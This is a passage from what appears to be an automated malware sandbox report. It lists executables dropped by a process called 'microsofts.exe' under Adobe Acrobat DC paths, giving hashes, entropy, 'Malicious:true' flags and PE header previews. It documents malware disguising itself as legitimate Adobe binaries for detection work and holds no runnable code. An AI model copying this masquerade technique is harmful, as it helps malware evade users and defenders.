                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1461248
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.468610482197607
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:75zhM1XSEisqjnhMgeiCl7G0nehbGZpbD:PMsHDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7A2E793BE84333B854166922E53DAF55
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C8CFAC04C7A6D76FD2A777A45527517EC1C34B48
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:34A532A2089F443BDDD02CFD1F20B97DA7B6A23BBFD29D26B9A6E1D95E01C0A8
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AC7CF696D11E3FB7A93B1B1E375AB78CC4A4730DE08A8ACB68D0BF8B1E7F734E54CF75B9A188D451D2361A71AEC9F5CEE7D85BB46A21AE9425B171C90CD2DFC2
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@.....................................q.... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.499775997976205
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:NtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755JDmg27RN:NjEIa4HIEWOc5TD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BE9FE51EA455F6BF34C50A7F15EA5ECA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4AD0443D31EA05EE610F2A0AE5A17474EF784458
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DFC3135CDC2D39FFF4B93D7DDC6555439AA6D3A8EADD971E194226A7CC56F561
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:677F3E22140B306779C7DA335D1C8E1C0A37796217800E3AD893C992A16068414285B130489CE5CB37A4716D4DDD400BC068368806AB98F761C4132094753CC6
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999367311925371
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1572864:WQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:1XhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6DCE356FE7DF61A6D00B250D362E416B
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:724F47D87010D8F3E20E5EAE9EE50E4EF47A08AD
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:16A0BEB00EE61F8AE8D485AB199B8F543B8B3695B73508662CF2694FC27C5CCE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EC4C032E5E8B3F7BFBD1A2C5A834E1FBE90359CA6014AB7827A043CEEB982015DD6A332C8FDB5D960DCB55864101E0B9DF5E941BB570DC6A1B4CEB9106542BCC
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......d..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1180160
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.084800476175956
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:tWHXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tysqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8E8EDB21C2C7590FBD1077F6F039E925
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BCE6451E67BD39BB637414AF4D4B3895683F3308
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:69CB56310C5E88477F2C0612CF1AD353C0DCEB588F69AF93590DDF3E29FD2AEB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:013E8811958DF19938FB2EBC43242E5D735D85FD9B51F6F3BA8DB0067155FD186BCB16A9B466CD75144692DC7CBFCEC3EDBBACB5FA30C1AFBEE46EDD526BF2EA
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@......{..... .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):6210048
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.3866997428856
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:8DvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXV:lnN9KfxLk6GEQTX5UKzNDAD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:174D67EF3DC25EDE2AE5259D62179FED
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BC5D6A40208205CF376CCD49804806191EFB1ED7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AEAE80805DD8BF161392EA3BAB6E166A24265FD853A17F0EAFD64BA9EB07F7EF
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:298B38855C90859B57EC36DCC974FC83874218D9BF0129162A6C2DD151DDD6A8BA3C92922643C4E5F447A34A7941DDCDD984C56291D69D8AE2CCBC3E4C2D58CC
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......_... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1157120
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.041486249040633
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:L6Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:L6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C07E22E815860C387D769AB029EC4571
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:3298820A1DC3A39B00888FE15B085448A45896B0
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6478BC688C2091E99FA940FC215F90323047DEC62E1C57AB06AAD3F755687694
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1A06A82B722D89B56DC63509392CBC860C9D9625F61EB8D241965AE280FCEAC5C4A448570FD89A047DB3EB2E23840F3EA10986DDE1784CD9FE52E7ECA058D1FF
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@....................................]..... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12039168
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.5966745323791045
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:98304:rb+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKZD527BWG:XnPgTHIwZoRBk9DdhSUEVIXgKZVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6E8DD2A65C4F5C7A2FE57593AF4F8AFA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:25F4A978DE6C8A0BCF9582B6BCD22E05DC7A821C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A7D1BD614DAC605CA1626DF17E5A21552DFC5056934E149385D6E00EFD6D8F56
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AC6AED4CC7C5317134860C3AF5A1938CE67713A382B7C8C8CF579A776ADEFEE1941845ECC6CB6F657260C51C569178086364F284239D210A7A4B8BE59CD6BA47
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@......................................... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1322496
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.281815901423947
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:Eg5FvCPusVsqjnhMgeiCl7G0nehbGZpbD:hftqDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5B9C0B4ED2C16380AD6E7D584DAEB5EF
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2D8BCCFC85FA6C26F7CAEFB84B96BFBD892FB8AD
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:730932ACB4842A7C4D887D1972A177D9C5D36D1AD88F85BC22A439D84E06119E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:92337951C00D3D9F6CB6FE00442FB3C3AB6F562D1A86E7E7202324FA507CB7C1386794BA4FAAF2A78BCA4F2084009A5955CA8C95475AA99CCB7F5C0373EF3B9B
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p......5..... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1339904
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.2088716458489115
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:MjKTIsAjFuvtIfmFthMaT5U8aChaeu7sqjnhMgeiCl7G0nehbGZpbD:MjIMmPh7TT79yDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6FC734EFE8B446480330C66AA2078191
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AADB786A292246A3FF82CB435FD4ADE46E2E8FEF
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A5F21BC747FC2A825DB901BCAF4EA17E90452ACFDCA1CEE9C8C7198ABEDCEEEE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C0E779AC90B223DAA3ED6D3357843DFE6F6C7A035201FBC75D1693EBADB8B5D7FF57A2900754977E580B53313D28B7E0B6136D19D443FD097C3AB77273479899
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$........... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1515520
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.411767438157768
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:gGqVwCto1Gm5WgXsqjnhMgeiCl7G0nehbGZpbD:tZ1GmUQDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:92D7F92DECEA39CE9978B09AFE49DA33
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1F6608545123AFA2A2A15D6344FA39691F3C0765
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:021814A22F523CB3F1F3D73C1E64363551501B171E1D5A7FE4F79FA79D72C29F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7A10C4B26B4624FCC5F887CAF4482F1EA6DE198FEBF4E0BC8085724C4D1602B36A742A658FD9DC09C28974DCC17EDD41374E0D64AE770B91C0BFECD69175A953
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@.......................................... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1253376
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.157409869859376
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:wWBWbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:wWBWbsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5F6113C0099A6204290DA6646483BE06
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2A09AF117F5E87A0AD473F5CDD7CBCD4D17E0711
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FBC08519308062697B16F950F331E99946C6F9AFED3C236CEA7E7AF016BC4FEA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B3CF01E2BA5220E225CD564749C8E237AC2BBEB47AEFA84B7D0E100DC24971FE2F2FBF0B63DB148E50A493945463021F193A864EBF908BD83C19D1E64BAB1FD5
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`......"O.... .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.228485020668229
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:Gf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa04sqjnhMgeiCl7G0nehbGZpbD:G+GtCi27mVTyT+a0kDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C1CC2720E37251D6B5745658788DEEC3
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C8FE015C06A69AC61D6C5395891469DFF455F74A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:19B8746518442B954DCA7DED15F402207B0BE0664E955C16A3685BA08AA7DF86
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9883BC29A98C8623BB75975B3D7842C71F5D2022CEE90776D41A57A9F4FDF1FCBA4BE57FAD7C4D01E5FBC9B92A744B7DAC4E41D7DD893340FC03ECC00F1EE6C8
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.....................................j.... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3110912
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.6496623632989476
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:CU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYzDmg27RnWGj:H2NfHOIK5Ns6qR9lD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DA64A3C3AE6B00948D203268393E3470
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E1D0E6F7F32B30F8D98D9A50656836F096ADE983
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E115549D223A54FE02E1A5F9811F54AEAC95C95FD40CEB61354AF6E0EF8EB4A4
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A9CDEBA3C9DFAB8B6554AD69FCF701C959D9C968392F7B741EE0FFAD84D09FA87035E6AAA1298051703F1F5C71C3830324F0FF18E7AF733C57566208FE2A841D
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......m0... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1588224
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.531910522660362
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:ykcWTUQcydnsqjnhMgeiCl7G0nehbGZpbD:yhKUcDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4DA953BFC7F31426E9DEB30A389F3F39
